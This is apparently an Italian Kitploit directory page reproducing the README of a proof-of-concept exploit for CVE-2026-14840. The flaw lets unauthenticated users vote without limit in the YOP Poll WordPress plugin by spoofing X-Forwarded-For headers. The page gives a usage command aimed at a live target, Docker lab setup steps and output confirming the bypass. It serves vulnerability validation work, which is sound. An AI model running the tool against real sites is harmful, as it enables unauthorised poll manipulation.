Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14840 — Exploit proof-of-concept per il bypass del limite di voti di un plugin WordPress tramite header X-Forwarded-For contraffatti; include un laboratorio Docker per validare CVE-2026-14840 su istanze WordPress autorizzate. | Kitploit
Strumenti/GitHubGitHub/nullwhisper/cve-2026-14840
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingLab e Pratica
GitHubnullwhisper/cve-2026-14840

CVE-2026-14840

Exploit proof-of-concept per il bypass del limite di voti di un plugin WordPress tramite header X-Forwarded-For contraffatti; include un laboratorio Docker per validare CVE-2026-14840 su istanze WordPress autorizzate.

Vedi Repository
41 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14840 — Bypass del limite di voto di YOP Poll < 7.0.6

Autore: nullwhisper
Caso d'uso: solo ricerca di sicurezza autorizzata / validazione di vulnerabilità.

Cos'è questo?

Il plugin YOP Poll versioni < 7.0.6 impone un limite di un voto per IP. Il problema è che per ottenere l'IP del client controlla HTTP_CLIENT_IP e HTTP_X_FORWARDED_FOR prima di REMOTE_ADDR. Entrambi gli header sono controllati dall'attaccante, quindi un utente non autenticato può falsificare un nuovo IP a ogni richiesta e votare un numero illimitato di volte.

  • CVE: CVE-2026-14840
  • Prodotto: plugin WordPress YOP Poll
  • Versioni interessate: < 7.0.6
  • Versione corretta: 7.0.6
  • Tipo: bypass del controllo di accesso
  • CVSS: 5.3

Riferimenti

  • WPScan: https://wpscan.com/vulnerability/fc810ca2-3f27-414d-b94a-68842925b7c6/
  • Scheda CVE: https://www.cve.org/CVERecord?id=CVE-2026-14840
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14840

File

.
├── cve_2026_14840_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a poll + public test page
├── requirements.txt
└── README.md

Installazione

pip3 install -r requirements.txt

Utilizzo

Target live

python3 cve_2026_14840_poc.py -u https://target.com/page-with-poll -n 10

-n è il numero di voti da esprimere. Se viene accettato più di un voto, il target è vulnerabile.

Lo script ripiega automaticamente su ?rest_route=/yop-poll/v1/votes quando il sito utilizza i permalink semplici di WordPress e /wp-json/... restituisce HTML.

Lab locale

  1. Scarica il plugin vulnerabile (non ridistribuire il binario del plugin):

    mkdir -p lab/yop-poll
    cd lab/yop-poll
    wget https://downloads.wordpress.org/plugin/yop-poll.7.0.5.zip
    unzip yop-poll.7.0.5.zip && rm yop-poll.7.0.5.zip
    cd ../..
    
  2. Avvia il lab:

    cd lab
    docker compose up -d
    
  3. Completa l'installazione di WordPress su http://127.0.0.1:8090.

  4. Crea il sondaggio e la pagina di test:

    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Esegui il PoC:

    python3 cve_2026_14840_poc.py -u 'http://127.0.0.1:8090/?page_id=4' -n 5
    

Verificato su localhost

Testato su WordPress 6.8 + YOP Poll 7.0.5 con permalink semplici predefiniti.

Stesso IP tre volte — il limite funziona:

#1 201 -> Vote recorded successfully.
#2 403 -> You have already voted on this poll.
#3 403 -> You have already voted on this poll.

IP diverso a ogni richiesta tramite X-Forwarded-For — il bypass funziona:

#1 201 -> Vote recorded successfully.
#2 201 -> Vote recorded successfully.
#3 201 -> Vote recorded successfully.

La tabella wp_yoppoll_votes cresce di una riga per ogni IP falsificato, confermando che il limite per-IP viene bypassato.

Perché il plugin non è incluso

Questo repository contiene solo il PoC e i file di orchestrazione del lab. Il plugin YOP Poll è GPL-2.0+, ma distribuire una copia completa non è necessario, appesantisce il repository e può causare problemi. Scarica la versione 7.0.5 da WordPress.org per il tuo lab.

Esclusione di responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e ricerca. Non usarlo contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione a eseguire test. L'autore non è responsabile per usi impropri o danni causati da questo codice.

Scarica lo strumento